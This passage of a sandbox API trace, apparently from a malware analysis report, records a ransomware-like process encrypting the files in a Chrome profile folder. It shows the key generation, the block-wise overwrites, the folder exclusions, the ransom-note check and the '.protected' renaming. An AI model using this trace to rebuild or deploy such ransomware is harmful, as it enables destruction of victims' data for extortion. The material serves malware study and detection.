lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.263] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.263] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.263] CloseHandle (hObject=0x154) returned 1 [0084.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.protected") returned 109 [0084.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.protected")) returned 1 [0084.264] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Windows") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Program Files") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="Program Files (x86)") returned -1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="$Recycle.bin") returned 1 [0084.264] lstrcmpiW (lpString1="previews_opt_out.db-journal", lpString2="System Volume Information") returned -1 [0084.264] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.264] StrStrIW (lpFirst="previews_opt_out.db-journal", lpSrch=".protected") returned 0x0 [0084.264] lstrcmpW (lpString1="previews_opt_out.db-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.264] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".txt") returned 0x0 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".rar") returned 0x0 [0084.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned 107 [0084.265] StrStrW (lpFirst="previews_opt_out.db-journal", lpSrch=".zip") returned 0x0 [0084.265] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.265] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.265] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.266] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.266] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.266] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.267] CloseHandle (hObject=0x154) returned 1 [0084.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.protected") returned 117 [0084.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal.protected")) returned 1 [0084.268] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Windows") returned -1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Program Files") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="Program Files (x86)") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="$Recycle.bin") returned 1 [0084.268] lstrcmpiW (lpString1="QuotaManager", lpString2="System Volume Information") returned -1 [0084.268] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrIW (lpFirst="QuotaManager", lpSrch=".protected") returned 0x0 [0084.268] lstrcmpW (lpString1="QuotaManager", lpString2="RESTORE_FILES.txt") returned -1 [0084.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".txt") returned 0x0 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".rar") returned 0x0 [0084.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned 92 [0084.268] StrStrW (lpFirst="QuotaManager", lpSrch=".zip") returned 0x0 [0084.268] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.288] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.288] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.289] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.289] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.289] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.289] CloseHandle (hObject=0x154) returned 1 [0084.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected") returned 102 [0084.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager.protected")) returned 1 [0084.290] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Windows") returned -1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Program Files") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="Program Files (x86)") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="$Recycle.bin") returned 1 [0084.305] lstrcmpiW (lpString1="QuotaManager-journal", lpString2="System Volume Information") returned -1 [0084.305] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.305] StrStrIW (lpFirst="QuotaManager-journal", lpSrch=".protected") returned 0x0 [0084.305] lstrcmpW (lpString1="QuotaManager-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".txt") returned 0x0 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".rar") returned 0x0 [0084.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned 100 [0084.306] StrStrW (lpFirst="QuotaManager-journal", lpSrch=".zip") returned 0x0 [0084.306] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.306] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.306] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.307] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.307] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.307] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.307] CloseHandle (hObject=0x154) returned 1 [0084.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.protected") returned 110 [0084.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager-journal.protected")) returned 1 [0084.309] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Windows") returned -1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Program Files") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="Program Files (x86)") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="$Recycle.bin") returned 1 [0084.309] lstrcmpiW (lpString1="QuotaManager.protected", lpString2="System Volume Information") returned -1 [0084.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager.protected") returned 102 [0084.309] StrStrIW (lpFirst="QuotaManager.protected", lpSrch=".protected") returned=".protected" [0084.309] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Windows") returned -1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Program Files") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="Program Files (x86)") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="$Recycle.bin") returned 1 [0084.309] lstrcmpiW (lpString1="README", lpString2="System Volume Information") returned -1 [0084.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.309] StrStrIW (lpFirst="README", lpSrch=".protected") returned 0x0 [0084.309] lstrcmpW (lpString1="README", lpString2="RESTORE_FILES.txt") returned -1 [0084.309] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.309] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".txt") returned 0x0 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".rar") returned 0x0 [0084.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned 86 [0084.311] StrStrW (lpFirst="README", lpSrch=".zip") returned 0x0 [0084.311] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xb4, lpOverlapped=0x0) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.312] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xb4, lpOverlapped=0x0) returned 1 [0084.313] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.313] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.313] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.313] CloseHandle (hObject=0x154) returned 1 [0084.313] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.protected") returned 96 [0084.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\readme.protected")) returned 1 [0084.314] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Windows") returned -1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Program Files") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="Program Files (x86)") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="$Recycle.bin") returned 1 [0084.314] lstrcmpiW (lpString1="Secure Preferences", lpString2="System Volume Information") returned -1 [0084.314] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrIW (lpFirst="Secure Preferences", lpSrch=".protected") returned 0x0 [0084.314] lstrcmpW (lpString1="Secure Preferences", lpString2="RESTORE_FILES.txt") returned 1 [0084.314] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.314] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".txt") returned 0x0 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".rar") returned 0x0 [0084.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0084.314] StrStrW (lpFirst="Secure Preferences", lpSrch=".zip") returned 0x0 [0084.315] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.316] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.316] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.317] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.317] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.317] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.317] CloseHandle (hObject=0x154) returned 1 [0084.317] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.protected") returned 108 [0084.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences.protected")) returned 1 [0084.318] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="Windows") returned -1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="Program Files") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="Program Files (x86)") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="$Recycle.bin") returned 1 [0084.318] lstrcmpiW (lpString1="Shortcuts", lpString2="System Volume Information") returned -1 [0084.318] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.318] StrStrIW (lpFirst="Shortcuts", lpSrch=".protected") returned 0x0 [0084.318] lstrcmpW (lpString1="Shortcuts", lpString2="RESTORE_FILES.txt") returned 1 [0084.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 